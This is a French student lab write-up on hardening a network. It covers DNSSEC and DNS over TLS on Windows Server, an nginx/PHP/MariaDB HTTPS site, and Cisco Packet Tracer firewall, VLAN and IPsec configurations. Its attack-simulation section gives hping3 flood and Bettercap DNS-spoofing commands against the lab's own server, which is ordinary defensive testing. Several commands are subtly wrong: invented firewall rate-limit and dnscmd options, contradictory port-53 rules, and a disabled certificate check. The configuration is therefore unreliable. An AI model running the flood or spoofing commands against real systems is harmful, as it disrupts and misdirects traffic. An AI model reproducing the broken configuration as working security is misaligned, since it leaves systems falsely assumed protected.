# WRITE-UP SAE4.CYBER.01 - SÉCURISER UN SYSTÈME D'INFORMATION

Préparé par : Adam Lernould Leroy Remi Duforets Thomas Said Imene

# Table des matières

| Table des matières                                                | 1  |
|-------------------------------------------------------------------|----|
| Configuration DNSSEC et DoT - Windows Serveur 2019                | 3  |
| 1. Configuration de l'adresse IP statique                         | 4  |
| 2. Configuration du service DNS                                   | 5  |
| 3. Configuration de DNSSEC                                        | 6  |
| 4. Mise en œuvre de DNS over TLS (DoT) avec Stunnel               | 8  |
| 5. Tester la configuration DNSSEC et DoT                          | 9  |
| 6. Activation de la protection contre les attaques DDoS           | 10 |
| 7. Configuration avancée du pare-feu Windows                      | 12 |
| 8. Activation des logs et surveillance du serveur DNS             | 14 |
| 9. Simulation d'attaques et validation de la protection           |    |
| 10. Justification de l'absence de Trust Anchors                   | 17 |
| Configuration Serveur Web nginx HTTPS sécurisé                    |    |
| 1. Installation des Composants (Nginx, PHP, MariaDB)              | 19 |
| 2. Création d'un Certificat SSL Auto-signé                        |    |
| 3. Configuration de Nginx avec SSL et Redirection HTTP vers HTTPS |    |
| 4. Configuration PHP (Sécurisation des Cookies)                   |    |
| 5. Création du Site Web Dynamique (PHP & MySQL avec SSL)          | 22 |
| 6. Création et Sécurisation de la Base de Données                 | 25 |
| 7. Configuration Pare-feu (UFW)                                   |    |
| 8. Protection contre les Attaques (DDoS)                          |    |
| 9. Vérification finale :                                          | 27 |
| Configuration maquette Cisco Packet Tracer                        |    |
| Configuration siège                                               |    |
| Attribution ip des pc                                             |    |
| Configuration switch L3                                           |    |
| Configuration firewall                                            |    |
| Configuration router siège                                        |    |
| Configuration du routeur principal (routeur du haut)              |    |
| Configuration succursale                                          |    |
| Attribution ip des pc :                                           |    |
| Configuration switch L3 :                                         |    |
| -<br>Configuration firewall                                       |    |
| Configuration routeur siège                                       | 40 |
| - •                                                               |    |

| Liste mot de passe :                                   | 42 |
|--------------------------------------------------------|----|
| Configuration sur les ASA :                            | 43 |
| Configuration sur les autres équipements :             | 43 |
| ANSII :                                                | 45 |
| Test de sécurité                                       | 46 |
| Découverte du réseau :                                 |    |
| Exploitation des failles :                             | 47 |
| Tunnel sécurisé IPsec GRE                              |    |
| 1. Fonctionnement de base                              |    |
| 2. Encapsulation des trames                            |    |
| 3. Détails techniques et négociations cryptographiques | 49 |
| 4. Associations de sécurité (SA)                       | 49 |
| 5. Gestion MTU et fragmentation                        | 50 |
| 6. Configuration réseau et pare-feu                    |    |
|                                                        |    |

# <u>Configuration DNSSEC et DoT -</u> <u>Windows Serveur 2019</u>

# 1. Configuration de l'adresse IP statique

#### Ouvrir les paramètres réseau

- $\blacktriangleright$  Accéder à Panneau de configuration  $\rightarrow$  Réseau et Internet  $\rightarrow$  Centre Réseau et partage
- > Cliquer sur Modifier les paramètres de la carte

#### **Configurer l'IP statique**

- > Faire un clic droit sur l'adaptateur réseau actif, puis cliquer sur Propriétés
- ➤ Sélectionner Protocole Internet version 4 (TCP/IPv4) → Propriétés

Renseigner :

Adresse IP : 192.168.1.10 Masque de sous-réseau : 255.255.255.192 Passerelle par défaut : 192.168.1.1 Serveur DNS : 127.0.0.1

#### Ajouter une adresse IP secondaire

➤ Cliquer sur Avancé... dans les paramètres IPv4

Ajouter :

Adresse IP : 192.168.1.11 Masque de sous-réseau : 255.255.255.192

# 2. Configuration du service DNS

# Installation du Service DNS

Install-WindowsFeature -Name DNS -IncludeManagementTools

# Création d'une zone de recherche directe

Add-DnsServerPrimaryZone -Name "societeDDLS.pepiniere.rt" -ZoneFile "societeDDLS.pepiniere.rt.dns" -DynamicUpdate Secure

### Ajouter un enregistrement DNS

Add-DnsServerResourceRecordA -ZoneName "societeDDLS.pepiniere.rt" -Name "mail" -IPv4Address "192.168.1.11"

# **<u>3. Configuration de DNSSEC</u>**

#### Activation de DNSSEC sur le serveur

dnscmd /config /EnableDnsSec 1 Restart-Service DNS

#### Signature de la zone DNS

Génération des clés de signature :

- ➤ KSK (Key Signing Key)
- ➤ ZSK (Zone Signing Key)

Signature des enregistrements DNS avec la ZSK.

Signature de la ZSK avec la KSK pour garantir l'intégrité des enregistrements DNS.

Publication des signatures et activation de la validation DNSSEC.

Activer les réponses sécurisées

dnscmd /Config /SecureResponses 1

#### Limiter la taille du cache DNS pour éviter les attaques par amplification

dnscmd /Config /MaxCacheTTL 300 dnscmd /Config /MaxNegativeCacheTTL 60

**Activer le Cache Locking** 

dnscmd /Config /CacheLockingPercent 70

Désactiver la récursion DNS (évite les abus en tant que résolveur ouvert) :

dnscmd /Config /NoRecursion 1 Restart-Service DNS

# 4. Mise en œuvre de DNS over TLS (DoT) avec Stunnel

# Installation de Stunnel

► Télécharger et installer Stunnel

#### Modifier stunnel.conf :

debug = info
output = C:\Program Files (x86)\stunnel\config\stunnel.log

[dns-tls] client = no accept = 853 connect = 127.0.0.1:53 cert = C:\Program Files (x86)\stunnel\bin\fullchain.crt key = C:\Program Files (x86)\stunnel\bin\dns.key accept = 0.0.0.0:853

delay = yes

## Démarrer Stunnel

net start stunnel

# 5. Tester la configuration DNSSEC et DoT

# Tester DNSSEC

Resolve-DnsName societeDDLS.pepiniere.rt -Server 127.0.0.1 -DnssecOk

Tester DNS-over-TLS

dig @192.168.1.10 -p 853 societeDDLS.pepiniere.rt +tls +dnssec

# 6. Activation de la protection contre les attaques DDoS

Limiter les requêtes DNS UDP et TCP entrantes pour éviter les attaques par inondation (DNS Flood)

New-NetFirewallRule -Name "Limit-DNS-UDP-Queries" -DisplayName "Limiter les requêtes DNS UDP" ` -Direction Inbound -Protocol UDP -LocalPort 53 -Action Allow -ThrottleLimit 20 -Enabled True -Profile Any

New-NetFirewallRule -Name "Limit-DNS-TCP-Queries" -DisplayName "Limiter les requêtes DNS TCP" ` -Direction Inbound -Protocol TCP -LocalPort 53 -Action Allow -ThrottleLimit 20 -Enabled True -Profile Any

#### Limiter les requêtes suspectes

New-NetFirewallRule -Name "Block-DNS-Amplification" -DisplayName "Bloquer les attaques d'amplification DNS" ` -Direction Inbound -Protocol UDP -LocalPort 53 -RemoteAddress Any -Action Block -Enabled True -Profile Any

#### Bloquer les requêtes DNS excessives en TCP

New-NetFirewallRule -Name "Block-Excessive-DNS-TCP" -DisplayName "Bloquer les requêtes DNS excessives en TCP" ` -Direction Inbound -Protocol TCP -LocalPort 53 -RemoteAddress Any -Action Block -Enabled True -Profile Any

#### Refuser les requêtes ANY pour limiter les scans DNS

Add-DnsServerQueryResolutionPolicy -Name "Block-ANY" -Action DENY -FQDN "eq,societeDDLS.pepiniere.rt" -QType "eq,ANY"

# Restreindre l'accès DNS aux IPs internes uniquement

New-NetFirewallRule -Name "Allow-Internal-DNS" -DisplayName "Autoriser DNS uniquement pour le réseau interne" ` -Direction Inbound -Protocol UDP -LocalPort 53 -RemoteAddress 192.168.1.0/26 -Action Allow -Enabled True -Profile Any

# 7. Configuration avancée du pare-feu Windows

## Autoriser le trafic DNS entrant

New-NetFirewallRule -Name "Allow-DNS-UDP-In" -DisplayName "Autoriser DNS UDP entrant" ` -Direction Inbound -Protocol UDP -LocalPort 53 -Action Allow -Enabled True -Profile Any

New-NetFirewallRule -Name "Allow-DNS-TCP-In" -DisplayName "Autoriser DNS TCP entrant" ` -Direction Inbound -Protocol TCP -LocalPort 53 -Action Allow -Enabled True -Profile Any

### Autoriser DNS-over-TLS

New-NetFirewallRule -Name "Allow-DNS-over-TLS" -DisplayName "Autoriser DNS-over-TLS (Entrant)" `
-Direction Inbound -Protocol TCP -LocalPort 853 -Action Allow -Enabled True -Profile Any

#### Bloquer tout DNS clair sortant

New-NetFirewallRule -Name "Block-Cleartext-DNS-Out" -DisplayName "Bloquer le trafic DNS en clair sortant" ` -Direction Outbound -Protocol Any -LocalPort 53 -Action Block -Enabled True -Profile Any

#### **Bloquer tout DNS clair entrant**

New-NetFirewallRule -Name "Block-Cleartext-DNS-In" -DisplayName "Bloquer le trafic DNS en clair entrant" ` -Direction Inbound -Protocol Any -LocalPort 53 -Action Block -Enabled True -Profile Any

# Rediriger tout trafic DNS vers DNS-over-TLS

New-NetFirewallRule -Name "Redirect-DNS-to-TLS" -DisplayName "Rediriger DNS vers DNS-over-TLS" `
-Direction Outbound -Protocol Any -LocalPort 53 -Action Block -Enabled True -Profile Any

## Autoriser Stunnel pour DNS-over-TLS

New-NetFirewallRule -Name "Allow-Stunnel-DNS-TLS" -DisplayName "Autoriser Stunnel pour DNS-over-TLS" ` -Direction Inbound -Protocol TCP -LocalPort 853 -Action Allow -Enabled True -Profile Any

#### Voir toutes les règles

Get-NetFirewallRule | Where-Object { \$\_.DisplayName -like "\*DNS\*" } | Format-Table -AutoSize

# 8. Activation des logs et surveillance du serveur DNS

Activer la journalisation complète

Set-NetFirewallProfile -Profile Domain,Private,Public -LogBlocked True

Vérifier les logs

Get-WinEvent -LogName "Microsoft-Windows-Windows Firewall With Advanced Security/Firewall"

# 9. Simulation d'attaques et validation de la protection

Test de reconnaissance réseau avec PING But : Vérifier si le serveur répond aux requêtes ICMP. ping 192.168.1.10

Simulation d'attaque par inondation UDP avec hping3 But : Tester la capacité du serveur à limiter le trafic DNS UDP. sudo hping3 --udp -p 53 192.168.1.10 --flood --rand-source

Test de protection avancée avec une attaque DNS ANY

But : Vérifier si les requêtes ANY sont bloquées.

dig ANY societeDDLS.pepiniere.rt @192.168.1.10

Test d'attaque par amplification DNS

But : Vérifier si le serveur répond aux requêtes volumineuses.

dig +short google.com @192.168.1.10

Test d'attaque par empoisonnement du cache DNS

But : Vérifier si le cache DNS est vulnérable à l'injection de fausses entrées.

nslookup google.com 192.168.1.10

#### Test de DNS Spoofing avec Bettercap

But : Vérifier si un attaquant peut rediriger le trafic DNS des clients vers une fausse adresse IP.

#### Lancer Bettercap en mode interactif

sudo bettercap -iface ethO

#### Activer le module DNS Spoofing

set dns.spoof.domains societeDDLS.pepiniere.rt set dns.spoof.address 192.168.1.20 dns.spoof on

#### Observation des requêtes redirigées

Depuis le poste victime (192.168.1.20), effectuer une requête :

nslookup societeDDLS.pepiniere.rt

#### Vérification du cache DNS pour détecter d'éventuelles anomalies

But : Confirmer l'intégrité des entrées stockées en cache.

Windows : Get-DnsServerCache

#### Vérification du cache ARP sur les machines pour détecter du spoofing

Ubuntu : arp -n Windows : arp -a

# 10. Justification de l'absence de Trust Anchors

Le serveur DNS étant interne, il ne nécessite pas de validation DNSSEC pour les zones publiques. Les Trust Anchors ne sont donc pas requis.

# <u>Configuration Serveur Web nginx</u> <u>HTTPS sécurisé</u>

# 1. Installation des Composants (Nginx, PHP, MariaDB)

Mise à jour et installation :

sudo apt update && sudo apt upgrade -y sudo apt install nginx php8.3-fpm php8.3-mysql mariadb-server -y

Démarrage des services :

sudo systemctl enable --now nginx mariadb php8.3-fpm

# 2. Création d'un Certificat SSL Auto-signé

Création du répertoire sécurisé :

sudo mkdir /etc/nginx/ssl sudo chmod 700 /etc/nginx/ssl

Génération de la clé et du certificat :

sudo openssl genrsa -out /etc/nginx/ssl/selfsigned.key 4096 sudo openssl req -x509 -nodes -days 3650 -key /etc/nginx/ssl/selfsigned.key -out /etc/nginx/ssl/selfsigned.crt sudo openssl dhparam -out /etc/nginx/ssl/dhparam.pem 4096

# 3. Configuration de Nginx avec SSL et Redirection HTTP vers HTTPS

Chemin:/etc/nginx/sites-available/mon\_site\_secure

Créer le fichier :

sudo nano /etc/nginx/sites-available/mon\_site\_secure

Contenu complet du fichier :

```
server {
   listen 443 ssl;
   server name exemple.com;
    # Chemins vers le certificat auto-signé et sa clé
    ssl certificate /etc/ssl/certs/votre certificat.pem;
    ssl certificate key /etc/ssl/private/votre cle privee.pem;
    # Protocoles TLS et chiffrements conformes aux recommandations
ANSSI
    ssl protocols TLSv1.2 TLSv1.3;
   ssl prefer server ciphers on;
    ssl ciphers
'ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384:HIGH:!aNULL:
!MD5:!3DES';
    # En-têtes de sécurité
   add_header Strict-Transport-Security "max-age=31536000;
includeSubDomains" always;
    add header X-Frame-Options SAMEORIGIN always;
    add header X-XSS-Protection "1; mode=block" always;
    add header X-Content-Type-Options nosniff always;
    add header Content-Security-Policy "default-src 'self'" always;
    # Désactivation de la compression pour limiter les risques BREACH
sur les pages sensibles
   gzip off;
    # Répertoire racine du site et fichier index
    root /var/www/votre site;
    index index.php index.html;
```

```
# Bloc pour refuser l'accès aux fichiers de sauvegarde (ex.
#wp-config.php#)
    location ~* /#.*# {
       deny all;
       access log off;
       log_not_found off;
    }
    # Traitement des fichiers PHP via PHP-FPM
    location ~ \ \
       include snippets/fastcgi-php.conf;
        fastcgi pass unix:/run/php/php8.3-fpm.sock;
    }
    # Gestion des autres requêtes
    location / {
       try files $uri $uri/ =404;
    }
}
# Bloc HTTP (port 80) - Redirection vers HTTPS avec en-têtes de
sécurité
server {
   listen 80;
   server name exemple.com;
    # Ajout d'en-têtes pour la protection même sur HTTP
    add header X-Frame-Options "SAMEORIGIN" always;
    add header X-Content-Type-Options "nosniff" always;
   return 301 https://$host$request uri;
}
```

Activation du site :

sudo In -s /etc/nginx/sites-available/mon\_site\_secure /etc/nginx/sites-enabled/
sudo unlink /etc/nginx/sites-enabled/default

# 4. Configuration PHP (Sécurisation des Cookies)

Chemin:/etc/php/8.3/fpm/php.ini

Modifier :

session.cookie\_secure = 1

session.cookie\_httponly = 1

**Redémarrer PHP :** 

sudo systemctl restart php8.3-fpm

### 5. Création du Site Web Dynamique (PHP & MySQL avec SSL)

Répertoire web:/var/www/mon\_site\_secure

Création du répertoire web :

sudo mkdir -p /var/www/mon\_site\_secure sudo chown -R www-data:www-data /var/www/mon\_site\_secure

Fichier:/var/www/mon\_site\_secure/index.php

```
<?php
session start();
// Générer un token CSRF s'il n'existe pas déjà
if (empty($ SESSION['csrf token'])) {
    $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
}
?>
<!DOCTYPE html>
<html lang="fr">
<head>
 <meta charset="UTF-8">
 <title>Connexion</title>
</head>
<body>
  <h1>Connexion</h1>
  <form action="login.php" method="post">
```

```
</form>
</body>
</html>
```

```
Fichier:/var/www/mon_site_secure/login.php
```

```
<?php
session start();
if ($ SERVER["REQUEST METHOD"] === "POST") {
    // Vérification du token CSRF
    if (!isset($ POST['csrf token']) || $ POST['csrf token'] !==
$ SESSION['csrf token']) {
       die("Requête invalide.");
    }
    $username = trim($ POST["username"]);
    $password = $ POST["password"];
   try {
        // Configuration PDO avec SSL (certificat auto-signé)
        // Ici, nous utilisons uniquement SSL CA pour établir une
connexion SSL
        $options = [
            PDO::ATTR ERRMODE => PDO::ERRMODE EXCEPTION,
            PDO::ATTR DEFAULT FETCH MODE => PDO::FETCH ASSOC,
            PDO::ATTR TIMEOUT => 60,
            PDO::MYSQL ATTR SSL CA => '/etc/mysql/cacert.pem',
            // Comme le serveur n'exige pas l'authentification client,
on peut omettre SSL CERT et SSL KEY
           PDO::MYSQL ATTR SSL VERIFY SERVER CERT => false,
        1;
        // Forcer la connexion TCP via 127.0.0.1 (port 3306) pour
utiliser SSL
        pdo = new PDO(
'mysql:host=127.0.0.1;port=3306;dbname=votre base;charset=utf8mb4',
            'votre utilisateur',
            'votre motdepasse',
```

```
$options
        );
        // Préparation et exécution de la requête pour récupérer le
hash du mot de passe
       $stmt = $pdo->prepare("SELECT password hash FROM users WHERE
username = :username");
       $stmt->execute(['username' => $username]);
       $user = $stmt->fetch();
        if ($user && password verify($password,
$user["password hash"])) {
            $ SESSION['username'] = $username;
            header("Location: admin.php");
            exit();
        } else {
            echo "Identifiants incorrects.";
        }
    } catch (PDOException $e) {
       error log($e->getMessage());
       echo "Erreur interne.";
    }
} else {
   header("Location: index.php");
    exit();
}
?>
```

#### Fichier:/var/www/mon\_site\_secure/admin.php

```
<?php
session_start();
if (!isset($_SESSION['username'])) {
    header("Location: index.php");
    exit();
}
?>
<!DOCTYPE html>
<html lang="fr">
<head>
    <meta charset="UTF-8">
```

```
<title>Zone d'administration</title>
</head>
<body>
<hl>Bienvenue, <?php echo htmlspecialchars($_SESSION['username']); ?>
!</hl>
<!-- Contenu réservé aux administrateurs -->
</body>
```

# 6. Création et Sécurisation de la Base de Données

#### Création de la base de données

```
sudo mysql -u root -p
CREATE DATABASE votre base CHARACTER SET utf8mb4 COLLATE
utf8mb4 unicode ci;
USE votre base;
CREATE TABLE users (
    id INT AUTO INCREMENT PRIMARY KEY,
    username VARCHAR(255) NOT NULL UNIQUE,
    password hash VARCHAR(255) NOT NULL,
    created at DATETIME DEFAULT CURRENT TIMESTAMP
);
-- Pour générer le hash du mot de passe (par exemple "progtr00"),
exécutez en ligne de commande :
-- php -r "echo password hash('progtr00', PASSWORD DEFAULT).PHP EOL;"
-- Insérer l'administrateur (remplacez <hash généré> par le hash
obtenu)
INSERT INTO users (username, password hash)
VALUES ('admin', '<hash généré>');
```

#### Création de l'utilisateur applicatif avec privilèges limités

```
-- Créer l'utilisateur pour les connexions locales
CREATE USER 'votre_utilisateur'@'localhost' IDENTIFIED BY
'votre_motdepasse';
CREATE USER 'votre_utilisateur'@'l27.0.0.1' IDENTIFIED BY
'votre_motdepasse';
-- Accorder uniquement les privilèges nécessaires sur la base
'votre_base'
GRANT SELECT, INSERT, UPDATE, DELETE ON votre_base.* TO
'votre_utilisateur'@'localhost';
GRANT SELECT, INSERT, UPDATE, DELETE ON votre base.* TO
```

FLUSH PRIVILEGES;

#### Création d'un compte administratif distinct pour la maintenance

'votre utilisateur'@'127.0.0.1';

#### Vérification des privilèges

```
-- Créer un compte administratif distinct pour les tâches de
maintenance
CREATE USER 'admin_db'@'localhost' IDENTIFIED BY
'admin_motdepasse';
CREATE USER 'admin_db'@'127.0.0.1' IDENTIFIED BY
'admin_motdepasse';
```

```
-- Accorder tous les privilèges sur toutes les bases avec l'option
GRANT
GRANT ALL PRIVILEGES ON *.* TO 'admin_db'@'localhost' WITH GRANT
OPTION;
GRANT ALL PRIVILEGES ON *.* TO 'admin_db'@'l27.0.0.1' WITH GRANT
OPTION;
```

```
FLUSH PRIVILEGES;
```

# 7. Configuration Pare-feu (UFW)

sudo ufw allow 'Nginx Full' sudo ufw delete allow 'Nginx HTTP'

# 8. Protection contre les Attaques (DDoS)

```
Chemin:/etc/nginx/nginx.conf
```

Modifier :

http {
 limit\_req\_zone Sbinary\_remote\_addr zone=mylimit:10m rate=10r/s;
 include /etc/nginx/sites-enabled/\*;
}

Recharger Nginx :

sudo nginx -t && sudo systemctl reload nginx

# 9. <u>Vérification finale :</u>

sudo nginx -t sudo systemctl status nginx

# <u>Configuration maquette Cisco Packet</u> <u>Tracer</u>

# **Configuration siège**

#### Attribution ip des pc

- PC1 => 192.168.1.10/26, passerelle : 192.168.1.1
- PC2 => 192.168.1.70/26, passerelle : 192.168.1.65
- PC3 => 192.168.1.130/26, passerelle : 192.168.1.129
- PC4 (DMZ) => 192.168.254.10/24, passerelle : 192.168.254.1

#### **Configuration switch L3**

# **Configuration vlan**

en conf t vlan 10 vlan 20 vlan 30 int vlan 10 ip add 192.168.1.1 255.255.255.192 no sh int vlan 20 ip add 192.168.1.65 255.255.255.192 no sh

# Configuration lien GigabitEthernet pc

| 1                        |  |
|--------------------------|--|
| onf t                    |  |
|                          |  |
| t g1/0/1                 |  |
| vitchport mode access    |  |
| vitchport access vlan 10 |  |
| o sh                     |  |
|                          |  |
| t g1/0/2                 |  |
| vitchport mode access    |  |
| vitchport access vlan 20 |  |
| o sh                     |  |
|                          |  |
| t g1/0/3                 |  |
| vitchport mode access    |  |
| vitchnort access vlan 30 |  |
| n sh                     |  |
| , sii                    |  |

### **Configuration ACL entre VLAN**

ip access-list extended BLOCK\_VLAN\_10\_20\_30\_FOR\_VLAN\_20 deny icmp any 192.168.1.0 0.0.0.63 echo deny icmp any 192.168.2.0 0.0.0.63 echo deny icmp any 192.168.2.128 0.0.0.63 echo permit ip any any ip access-list extended BLOCK\_VLAN\_10\_20\_30\_FOR\_VLAN\_30 deny icmp any 192.168.1.0 0.0.0.63 echo deny icmp any 192.168.2.0 0.0.0.63 echo deny icmp any 192.168.2.64 0.0.0.63 echo deny icmp any 192.168.2.64 0.0.0.63 echo permit ip any any

ip access-group BLOCK\_VLAN\_10\_20\_30\_FOR\_VLAN\_20 in

int vlan 30

ip access-group BLOCK\_VLAN\_10\_20\_30\_FOR\_VLAN\_30 in

#### Configuration lien vers le firewall

int g1/0/4

no sw ip add 192.168.30.1 255.255.255.0 no sh

ip route 0.0.0.0 0.0.0.0 192.168.30.2

# **Configuration firewall**

# Il faut commencer par enlever la sevice policy par défaut

no service-policy global\_policy global

# Configuration lien vers le switch L3

route inside 192.168.1.0 255.255.255.0 192.168.30.1

# Ajout de la nouvelle service policy :

| class-map CMAP                   |
|----------------------------------|
| match default-inspection-traffic |
|                                  |
| policy-map PMAP                  |
| class CMAP                       |
| inspect dns                      |
| inspect ftp                      |
| inspect http                     |
| inspect icmp                     |
|                                  |
| service-policy PMAP global       |

## Configuration vers la DMZ :

int g1/3 ip add 192.168.254.1 255.255.255.0 no sh nameif dmz security-level O

### Configuration lien vers le router siège :

int g1/2 ip add 192.168.50.2 255.255.255.0 no sh nameif outside security-level O

route outside 0.0.0.0 0.0.0.0 192.168.50.1

# Avoir une communication entre le inside et le outside, il faut mettre en place un NAT dynamic :

object network OBJ\_INSIDE subnet 192.168.30.0 255.255.255.0 nat (inside,outside) dynamic interface

#### Configuration router siège

#### Tout d'abord, il faut activer la licence pour pouvoir faire le tunnel IPsec

license boot module c2900 technology-package securityk9 write memory reload

Normalement la licence doit être activée, si ce n'est pas le cas il faut recommencer la manipulation.

#### Lien avec le firewall

int g0/0

ip add 192.168.50.1 255.255.255.0 no sh ip nat inside

ip route 0.0.0.0 0.0.0.0 192.168.50.2

### Lien avec le routeur du haut

int gO/1 ip add 139.0.0.1 255.0.0.0 no sh ip ospf cost 1000 ip nat outside crypto map CRYPTO-MAP

ip nat inside source list 101 interface GigabitEthernetO/1 overload

access-list 101 deny ip 192.168.50.0 0.0.0.255 192.168.51.0 0.0.0.255 access-list 101 deny ip 192.168.50.0 0.0.0.255 192.168.31.0 0.0.0.255 access-list 101 deny ip 192.168.50.0 0.0.0.255 192.168.2.0 0.0.0.255 access-list 101 deny ip 192.168.30.0 0.0.0.255 192.168.51.0 0.0.0.255 access-list 101 deny ip 192.168.30.0 0.0.0.255 192.168.31.0 0.0.0.255 access-list 101 deny ip 192.168.30.0 0.0.0.255 192.168.2.0 0.0.0.255 access-list 101 deny ip 192.168.30.0 0.0.0.255 192.168.2.0 0.0.0.255 access-list 101 deny ip 192.168.1.0 0.0.0.255 192.168.51.0 0.0.0.255 access-list 101 deny ip 192.168.1.0 0.0.0.255 192.168.51.0 0.0.0.255 access-list 101 deny ip 192.168.1.0 0.0.0.255 192.168.31.0 0.0.0.255 access-list 101 deny ip 192.168.1.0 0.0.0.255 192.168.2.0 0.0.0.255 access-list 101 deny ip 192.168.1.0 0.0.0.255 192.168.2.0 0.0.0.255 access-list 101 deny ip 192.168.1.0 0.0.0.255 192.168.2.0 0.0.0.255 access-list 101 deny ip 192.168.1.0 0.0.0.255 192.168.2.0 0.0.0.255

router ospf 1 log-adjacency-changes network 139.0.0.0 0.255.255.255 area 0 network 172.16.1.0 0.0.0.3 area 0 network 192.168.50.0 0.0.0.255 area 0

### Mise en place du cryptage

crypto isakmp policy 10 encr aes authentication pre-share group 2

Configuration de la politique ISAKMP

crypto isakmp key MON\_SECRET address 134.0.0.1

Définition de la clé pré-partagée

crypto ipsec transform-set TRANS\_1 esp-aes esp-sha-hmac

Configuration de l'ensemble de transformation IPSec

crypto map CRYPTO-MAP 10 ipsec-isakmp set peer 134.0.0.1 set transform-set TRANS\_1 match address 100

Configuration de la carte crypto pour appliquer IPSec

## Mise en place du Tunnel IPsec :

interface TunnelO ip address 172.16.1.1 255.255.255.252 mtu 1476 tunnel source GigabitEthernetO/1 tunnel destination 134.0.0.1

ip route 192.168.2.0 255.255.255.0 172.16.1.2 ip route 192.168.51.0 255.255.255.0 172.16.1.2 ip route 192.168.31.0 255.255.255.0 172.16.1.2

access-list 100 permit gre host 139.0.0.1 host 134.0.0.1

#### Configuration du routeur principal (routeur du haut)

Lien avec le routeur siège :

int g0/0 ip add 139.0.0.2 255.0.0.0 no sh

#### Lien avec le routeur succursale :

int g0/1 ip add 134.0.0.2 255.0.0.0 no sh

## Mis en place du routage :

| router ospf 1                          |
|----------------------------------------|
| log-adjacency-changes                  |
| network 139.0.0.0 0.255.255.255 area 0 |
| network 134.0.0.0 0.255.255.255 area 0 |

# **Configuration succursale**

Attribution ip des pc :

- PC5 => 192.168.2.10/26, passerelle : 192.168.2.1
- PC6 => 192.168.2.70/26, passerelle : 192.168.2.65
- PC7 => 192.168.2.130/26, passerelle : 192.168.2.129
- PC8 (DMZ) => 192.168.253.10/24, passerelle : 192.168.253.1

 $Configuration \ switch \ L3:$ 

# Configuration vlan :

| en                                   |
|--------------------------------------|
| conf t                               |
|                                      |
| vlan 10                              |
| vlan 20                              |
| vlan 30                              |
|                                      |
| int vlan 10                          |
| ip add 192.168.2.1 255.255.255.192   |
| no sh                                |
|                                      |
| int vlan 20                          |
| ip add 192.168.2.65 255.255.255.192  |
| no sh                                |
|                                      |
|                                      |
| Ip add 192.168.2.129 255.255.255.192 |
| no sh                                |

# Configuration lien Gigabit Ethernet pc :

| en<br>conf t                                                               |  |
|----------------------------------------------------------------------------|--|
| int g1/0/1<br>switchport mode access<br>switchport access vlan 10<br>no sh |  |
| int g1/0/2<br>switchport mode access<br>switchport access vlan 20<br>no sh |  |

int g1/0/3 switchport mode access switchport access vlan 30 no sh

# $\label{eq:configuration} \textbf{Configuration} \ \textbf{ACL} \ \textbf{entre} \ \textbf{VLAN}:$

| ip access-list extended BLOCK_VLAN_10_20_30_FOR_VLAN_20 |  |
|---------------------------------------------------------|--|
| deny icmp any 192.168.1.0 0.0.0.63 echo                 |  |
| deny icmp any 192.168.2.0 0.0.0.63 echo                 |  |
| deny icmp any 192.168.1.128 0.0.0.63 echo               |  |
| deny icmp any 192.168.2.128 0.0.0.63 echo               |  |
| permit ip any any                                       |  |
| ip access-list extended BLOCK VLAN 10 20 30 FOR VLAN 30 |  |
| denv icmp anv 192.168.1.0 0.0.0.63 echo                 |  |
| deny icmp any 192.168.2.0 0.0.0.63 echo                 |  |
| deny icmp any 192.168.1.64 0.0.0.63 echo                |  |
| deny icmp any 192.168.2.64 0.0.0.63 echo                |  |
| permit ip any any                                       |  |
| int vlan 20                                             |  |
| ip access-group BLOCK_VLAN_10_20_30_FOR_VLAN_20 in      |  |
| int vlan 30                                             |  |
| in access-group BLOCK VLAN 10 20 30 FOR VLAN 30 in      |  |
|                                                         |  |

# Configuration lien vers le firewall :

| int g1/0/4                        |
|-----------------------------------|
| NO SW                             |
| ip add 192.168.31.1 255.255.255.0 |
| no sh                             |

ip route 0.0.0.0 0.0.0.0 192.168.31.2

# **Configuration firewall**

#### Il faut commencer par enlever la sevice policy par défaut :

no service-policy global\_policy global

### Configuration lien vers le switch L3 :

int g1/1 ip add 192.168.31.2 255.255.255.0 nameif inside security-level 0 no sh route inside 192.168.2.0 255.255.255.0 192.168.31.1

#### Ajout de la nouvelle service policy :

class-map CMAP

match default-inspection-traffic

policy-map PMAP class CMAP inspect dns

inspect ftp

inspect http

inspect icmp

service-policy PMAP global

### Configuration vers la DMZ :

int g1/3 ip add 192.168.253.1 255.255.255.0 no sh nameif dmz security-level O

#### Configuration lien vers le routeur succursale :

int g1/2 ip add 192.168.51.2 255.255.255.0 no sh nameif outside security-level O

route outside 0.0.0.0 0.0.0.0 192.168.51.1

#### Pour avoir une communication entre le inside et le outside, il

faut mettre en place un NAT dynamic :

object network OBJ\_INSIDE subnet 192.168.31.0 255.255.255.0 nat (inside,outside) dynamic interface

# Configuration routeur siège

Tout d'abord, il faut activer la licence pour pouvoir faire le tunnel IPsec :

license boot module c2900 technology-package securityk9 write memory reload

Normalement la licence doit être activée, si ce n'est pas le cas il faut recommencer la manipulation.

#### Lien avec le firewall :

int g0/1 ip add 192.168.51.1 255.255.255.0 no sh ip nat inside ip route 0.0.0.0 0.0.0.0 192.168.51.2 Lien avec le routeur du haut :

int gO/O ip add 134.0.0.1 255.0.0.0 no sh ip ospf cost 1000 ip nat outside crypto map CRYPTO-MAP

ip nat inside source list 101 interface GigabitEthernetO/O overload

access-list 101 deny ip 192.168.51.0 0.0.0.255 192.168.50.0 0.0.0.255 access-list 101 deny ip 192.168.51.0 0.0.0.255 192.168.30.0 0.0.0.255 access-list 101 deny ip 192.168.51.0 0.0.0.255 192.168.1.0 0.0.0.255 access-list 101 deny ip 192.168.31.0 0.0.0.255 192.168.50.0 0.0.0.255 access-list 101 deny ip 192.168.31.0 0.0.0.255 192.168.30.0 0.0.0.255 access-list 101 deny ip 192.168.31.0 0.0.0.255 192.168.30.0 0.0.0.255 access-list 101 deny ip 192.168.31.0 0.0.0.255 192.168.1.0 0.0.0.255 access-list 101 deny ip 192.168.2.0 0.0.0.255 192.168.50.0 0.0.0.255 access-list 101 deny ip 192.168.2.0 0.0.0.255 192.168.30.0 0.0.0.255 access-list 101 deny ip 192.168.2.0 0.0.0.255 192.168.30.0 0.0.0.255 access-list 101 deny ip 192.168.2.0 0.0.0.255 192.168.30.0 0.0.0.255 access-list 101 deny ip 192.168.2.0 0.0.0.255 192.168.1.0 0.0.0.255 access-list 101 deny ip 192.168.2.0 0.0.0.255 192.168.1.0 0.0.0.255 access-list 101 deny ip 192.168.2.0 0.0.0.255 192.168.1.0 0.0.0.255

